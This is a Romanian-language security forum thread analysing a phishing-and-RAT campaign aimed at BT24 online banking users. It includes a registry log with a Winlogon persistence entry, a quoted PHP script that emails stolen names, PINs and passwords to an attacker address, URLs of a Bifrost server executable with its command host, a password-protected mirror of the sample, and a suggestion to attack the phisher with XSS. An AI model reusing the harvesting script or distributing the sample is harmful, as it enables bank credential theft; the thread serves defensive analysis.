Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\shortServerName TDX-F66AAD8B5AA
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\uNCName \\tdx-f66aad8b5aa\Microsoft XPS Document Writer
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\versionNumber 4
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Location
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Name Microsoft XPS Document Writer
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\ObjectGUID
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Parameters
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Port XPSPort:
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Print Processor WinPrint
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Printer Driver Microsoft XPS Document Writer
Reg Key Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\FeatureKeyword BINARY SIZE=2 MD5=C4103F122D27677C9DB144CAE1394A66
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\FeatureKeywordSize 2
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\Forms? 1928778442
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\InitDriverVersion 1536
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\Model Microsoft XPS Document Writer
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\PrinterData BINARY SIZE=560 MD5=5FB20305A4C8E1AD8D66FD7E37635F2B
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\PrinterDataSize 560
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Priority 1
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Security BINARY SIZE=296 MD5=EDE42992E3DB259C8A86D09BD50BECAC
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Separator File
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Share Name
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\SpoolDirectory
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\StartTime 0
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Status 128
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\UntilTime 0
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\dnsTimeout 15000
Reg Val Added HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\txTimeout 45000
Reg Val Changed HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU "BINARY SIZE=16 MD5=550E494259E68F9603C0FE07F980E70A" (old value="BINARY SIZE=16 MD5=9C9E0BB1A9F364BDB4CDF118969A58CF")
Reg Val Changed HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Nqzvavfgengbe\Qrfxgbc\FlfgrzRkcybere.rkr "BINARY SIZE=16 MD5=3DC276E175808868AA64F536B191C23D" (old value="BINARY SIZE=16 MD5=3FC172AEE3B4D3BBC719B443C1DABF4A")
Reg Val Changed HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG "BINARY SIZE=16 MD5=11AFA458E635DEBA46531A1C99EF2181" (old value="BINARY SIZE=16 MD5=7026A6639D6AD5BE21DD2A3FEE0CBBD7")
Reg Val Changed HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\PresentationCore, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\1\ImageList "BINARY SIZE=2530 MD5=DA7AFF9DB0DC3478F0C33B9E7B8101C8" (old value="BINARY SIZE=2514 MD5=A8DBF25B79426BF0B2A7496BAED06DC0")
Reg Val Changed HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\PresentationFramework, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\1\Status "3" (old value="2")
Reg Val Changed HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed "BINARY SIZE=80 MD5=0ABF1D074E505CE9E52F8BD027337E03" (old value="BINARY SIZE=80 MD5=DAD86B2FE383EA7978D57922BD8A402D")
Reg Val Changed HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\ILUsageMask "BINARY SIZE=2 MD5=B08B7C15585E653ED9D7F4A0A186496F" (old value="BINARY SIZE=2 MD5=FB73C139137BCCFEE5D95BDDB087480A")
Reg Val Changed HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex "95" (old value="94")
Reg Val Changed HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NIUsageMask "BINARY SIZE=1 MD5=31741635B41D535098241FEA03C1E47F" (old value="BINARY SIZE=1 MD5=8C493A43D8C1EF798860BB02B62E8E79")
Reg Val Changed HKLM\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Refresh "0" (old value="1")
Reg Val Changed HKLM\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\WINDOWS\System32\Drivers\HTTP.sys[UlMofResource] "LowDateTime:740033152,HighDateTime:30036388***Binary mof compiled successfully" (old value="LowDateTime:560696064,HighDateTime:29883216***Binary mof compiled successfully")
Reg Val Changed HKLM\SOFTWARE\Microsoft\WBEM\WDM\C:\WINDOWS\System32\Drivers\HTTP.sys[UlMofResource] "LowDateTime:740033152,HighDateTime:30036388***Binary mof compiled successfully" (old value="LowDateTime:560696064,HighDateTime:29883216***Binary mof compiled successfully")
Reg Val Changed HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Counter "4088" (old value="4074")
Reg Val Changed HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Help "4089" (old value="4075")
Reg Val Changed HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell "Explorer.exe ,C:\WINDOWS\system32\efoqj.exe" (old value="Explorer.exe")
Reg Val Changed HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\First Counter "4076" (old value="3424")
Reg Val Changed HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\First Help "4077" (old value="3425")
Reg Val Changed HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Last Counter "4088" (old value="3436")
Reg Val Changed HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Last Help "4089" (old value="3437")
Reg Val Changed HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Object List "4076 4082" (old value="3424 3430")
Reg Val Changed HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count "0" (old value="1")
Reg Val Changed HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance "0" (old value="1")
Reg Key Deleted HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d
Reg Val Deleted HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d\ILUsageMask BINARY SIZE=1 MD5=00594FD4F42BA43FC1CA0427A0576295
Reg Val Deleted HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d\NIUsageMask BINARY SIZE=1 MD5=EC2D11028766E06AC33648E2F0A67320
Reg Val Deleted HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0 SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}

Link to comment
Share on other sites

Ce am gasit pe pagina specificata de tdxev hxxp://profilexx.haos.ro:

Un fisier numit <gohi.php> care contine:


<?php

$val=$_POST['nume']." ".$_POST['PIN']." ".$_POST['comp']." ".$_POST['oras']." ".$_POST['reg']." ".$_POST['user']." ".$_POST['pass'];


$to = "[COLOR="Red"]alinuzza235@yahoo.com[/COLOR]";
$subject ="From ip: ".getenv("REMOTE_ADDR");
$email ="fraier@tds.com" ;
$message =$val;
$headers = "From: $email";
$sent = mail($to, $subject, $message, $headers) ;
if($sent)
{
print "Accesati din nou aplicatia BT24 pentru autentificare.";
}
else
{print "ERROR"; }


?>

Probabil trimite serverul un request la asta si primeste el log-urile la adresa <alinuzza235@yahoo.com>.

Mai gasim pe acolo:

hxxp://profilexx.haos.ro/server.exe

hxxp://profilexx.haos.ro/profile.php

hxxp://profilexx.haos.ro/index.htm(identic cu profile.php)

Link to comment
Share on other sites

Nu reusesc sa-l sterg . Nu-mi apare nici un excutabil cu iconita de explorer.Alte metode ?

nu de la explorer, de la internet explorer.

vezi poate ai fisierele hidden. tools->folder options...->tabul "view"->activezi show hidden files and folders si dezactivezi urmatoarele 2.

mirror la a doua versiune :

http://www.2shared.com/file/11056545/c461aa93/update_virus.html

pass : rstcenter.com

  • Upvote 1
Link to comment
Share on other sites

Din dll-urile mentionate de Nytro am doar MSIMTF.DLL . Am facut setarile la Folder Options , tot nu-mi apare nici o iconita de Internet Explorer. Nod32 nu mi-a depistat nimic.Totusi eu am vizitat site-ul ala de vreo 2 ori.

Trebuie sa descarci si sa rulezi fisierul de acolo, altfel nu are ce sa se intample.

Fisierul gasit de ROFL la adresa "hxxp://profilexx.haos.ro/server.exe" l-am rulat si pare a fi un server de Bifrost incearca sa se conecteze la adresa 79.117.170.57:81 ip este de RDS ,nu a raspuns la ping foloseste DNS si probabil a schimbat ip-ul intretimp.

DNS folosit : "pariuri.no-ip.biz"

Sa-l studieze cineva care se pricepe mai bine.

http://profiles.yahoo.com/alinuzza235 => Alina - Member Since: 01/22/2010

Nu ar strica putin XSS pe adesa aia de mail... desi nu cred ca aveti mari sanse..se pricepe omul.

Link to comment
Share on other sites

Si eu am luat virusul asta .

I-am dat o scanare cu nod32, a aparut un virus infectat in adobe shockwave care dupa scanare la sters , l-am cautat acum in log-uri dar nu l-am gasit .

Am cautat in system32 iconite cu IE insa nu am gasit nici una .

Am scanat aceste fisiere cu virustotal , numai yahooauth2.dll fiind infectat , nod32 l-a gasit curat .

C:\WINDOWS\system32\YahooAuth2.dll

C:\WINDOWS\system32\libeay32.dll

C:\WINDOWS\system32\ssleay32.dll

C:\WINDOWS\system32\tqsbsf.exe

Cum pot afla daca mai sunt infectat ?

later :

Aici veti gasi mai multe informatii referitoare la eliminarea virusului , eu am folosit prima metoda si pot sa spun ca momentan virusul nu mai este .

Edited by FlaVirus
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...